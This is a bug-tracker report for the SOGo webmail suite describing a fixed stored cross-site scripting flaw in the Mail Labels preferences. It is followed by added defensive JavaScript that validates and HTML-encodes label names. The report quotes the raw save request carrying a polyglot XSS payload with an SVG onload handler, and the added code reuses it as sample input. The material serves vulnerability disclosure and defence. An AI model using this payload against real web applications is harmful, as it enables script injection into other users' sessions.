View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0006007 | SOGo | Web Preferences | public | 2024-08-19 23:59 | 2024-09-12 06:58 |
Reporter | julian123 | Assigned To | qhivert | ||
Priority | normal | Severity | minor | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Platform | [Server] Linux | OS | Ubuntu | OS Version | 16.04 LTS |
Product Version | 5.10.0 | ||||
Summary | 0006007: Stored-XSS in Mail Labels Field | ||||
Description | A cross-site scripting payload can be stored in the Mail Labels fields, leading to execution when the user navigates to their inbox. | ||||
Steps To Reproduce |
| ||||
Additional Information | POST /SOGo/so/john@123.com/Preferences/save HTTP/1.1 ],"$label3":["Personal","#009900"],"$forwarded":["Forwarded","#B01FE3"],"label":["//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1111)//>\\x3e","#aaa"]}, GET /SOGo/so/john@123.com/Preferences HTTP/1.1 HTTP/1.1 200 OK ...snip... | ||||
Tags | mail settings | ||||
Date Modified | Username | Field | Change |
---|---|---|---|
2024-08-19 23:59 | julian123 | New Issue | |
2024-08-19 23:59 | julian123 | Tag Attached: mail settings | |
2024-08-20 14:08 | qhivert | Relationship added | related to 0006010 |
2024-08-20 14:08 | qhivert | Relationship added | related to 0006004 |
2024-09-12 06:58 | qhivert | Assigned To | => qhivert |
2024-09-12 06:58 | qhivert | Status | new => closed |
2024-09-12 06:58 | qhivert | Resolution | open => fixed |
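
An added example, not part of the original report and not SOGo's code or its fix: one way to handle a label map shaped like the request body quoted above, validating each `[name, colour]` pair before it is stored and HTML-encoding the name when it is rendered. The function names, the 64-character limit and the rule rejecting `<`, `>` and control characters in names are assumptions; the sample input is constructed from the body in the report.

```javascript
// Added example (not SOGo code): validate label preferences on save and
// encode label names on output. All names and limits here are assumptions.
const HEX_COLOUR = /^#(?:[0-9a-fA-F]{3}|[0-9a-fA-F]{6})$/;
const MAX_NAME_LENGTH = 64; // assumed limit, not taken from SOGo

// Encode the characters that are significant in HTML text and attributes.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Server-side check of a {key: [name, colour]} map before it is stored.
// Entries with markup characters in the name or a non-hex colour are rejected.
function validateLabels(labels) {
  const accepted = {};
  const rejected = [];
  for (const [key, value] of Object.entries(labels)) {
    const ok = Array.isArray(value) && value.length === 2 &&
      typeof value[0] === 'string' && typeof value[1] === 'string' &&
      value[0].length > 0 && value[0].length <= MAX_NAME_LENGTH &&
      !/[<>\u0000-\u001f]/.test(value[0]) &&
      HEX_COLOUR.test(value[1]);
    if (ok) accepted[key] = value; else rejected.push(key);
  }
  return { accepted, rejected };
}

// Output-side defence: even if a bad value is already stored, the name is
// encoded and the colour is re-checked before either reaches the markup.
function renderLabel(name, colour) {
  const safeColour = HEX_COLOUR.test(colour) ? colour : '#000000';
  return `<span class="label" style="background-color:${safeColour}">` +
    `${escapeHtml(name)}</span>`;
}

// Constructed sample, based on the request body quoted in the report.
const sampleLabels = {
  '$label3': ['Personal', '#009900'],
  '$forwarded': ['Forwarded', '#B01FE3'],
  'label': ['//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert(1111)//>\\x3e', '#aaa'],
};

const result = validateLabels(sampleLabels);
console.log('rejected:', result.rejected);
console.log(renderLabel(sampleLabels.label[0], sampleLabels.label[1]));
```

Output encoding is the control that matters for values already stored before validation was introduced; the save-time check only keeps new bad values out.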